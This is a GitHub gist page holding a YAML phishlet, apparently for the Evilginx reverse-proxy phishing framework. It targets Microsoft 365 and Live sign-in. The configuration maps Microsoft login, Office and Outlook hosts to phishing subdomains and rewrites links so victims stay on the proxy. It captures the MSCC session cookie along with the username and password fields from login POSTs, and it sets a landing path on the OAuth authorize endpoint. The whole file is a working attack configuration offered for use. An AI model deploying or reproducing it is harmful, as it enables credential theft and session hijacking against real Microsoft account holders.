-
-
Save kafkaesqu3/7e771ad882357325fd9bd693b38d238d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| author: '@ztx' | |
| min_ver: '2.2.0' | |
| proxy_hosts: | |
| - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true} | |
| - {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: true} | |
| - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false} | |
| - {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'office365.com', session: false, is_landing: false} | |
| - {phish_sub: 'secure.aadcdn', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', session: true, is_landing: false} | |
| - {phish_sub: 'browser.pipe.aria', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', session: true, is_landing: false} | |
| - {phish_sub: 'r4.res', orig_sub: 'r4.res', domain: 'office365.com', session: true, is_landing: false} | |
| sub_filters: | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}/common/login', replace: 'https://{hostname}/common/login', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}/common/oauth2/authorize', replace: 'https://{hostname}/common/oauth2/authorize', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'secure.aadcdn.microsoftonline-p.com', orig_sub: 'secure.aadcdn', domain: 'microsoftonline-p.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'outlook.office365.com', orig_sub: 'outlook', domain: 'office365.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'www.office.com', orig_sub: 'www', domain: 'office.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'browser.pipe.aria.microsoft.com', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'r4.res.office365.com', orig_sub: 'r4.res', domain: 'office365.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/uxpreview/optout', replace: 'href="https://{hostname}/common/uxpreview/optout', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/reprocess', replace: 'href="https://{hostname}/common/reprocess', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/DeviceCodeStatus', replace: 'href="https://{hostname}/common/DeviceCodeStatus', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}/common/GetCredentialType', replace: 'href="https://{hostname}/common/GetCredentialType', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| - {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}/oauth20_authorize.srf', replace: 'href="https://{hostname}/oauth20_authorize.srf', mimes: ['text/html', 'application/json', 'application/javascript']} | |
| auth_tokens: | |
| - domain: '.microsoftonline.com' | |
| keys: ['MSCC'] | |
| credentials: | |
| username: | |
| key: 'loginfmt' | |
| search: '(.*)' | |
| type: 'post' | |
| password: | |
| key: 'passwd' | |
| search: '(.*)' | |
| type: 'post' | |
| landing_path: | |
| - '/common/oauth2/authorize?client_id=4345a7b9-9a63-4910-a426-35363201d503&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dQVP38VZWrKxBhMSr5V9mBZRcG6dmc9gxaQa9zOYCaWp0M-bLEQUIh73ToVQguasz4qX1-aMaahQst02SDHq-lVzFRyDxhh4FLGGzHT0_lb35xz8ETalM2fwH-Z2Mx-8L&nonce=636788589275218064.OGY5Mzg1NDktMTI2Yy00ODhmLWI3MDMtY2RjMDNkZWQ2MGI5ODRjNzhhN2UtZWZmYy00N2YxLWJiZTAtMTgxYmJkMmFiODM1&redirect_uri=https%3a%2f%2fwww.office.com%2f&ui_locales=en-US&mkt=en-US' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment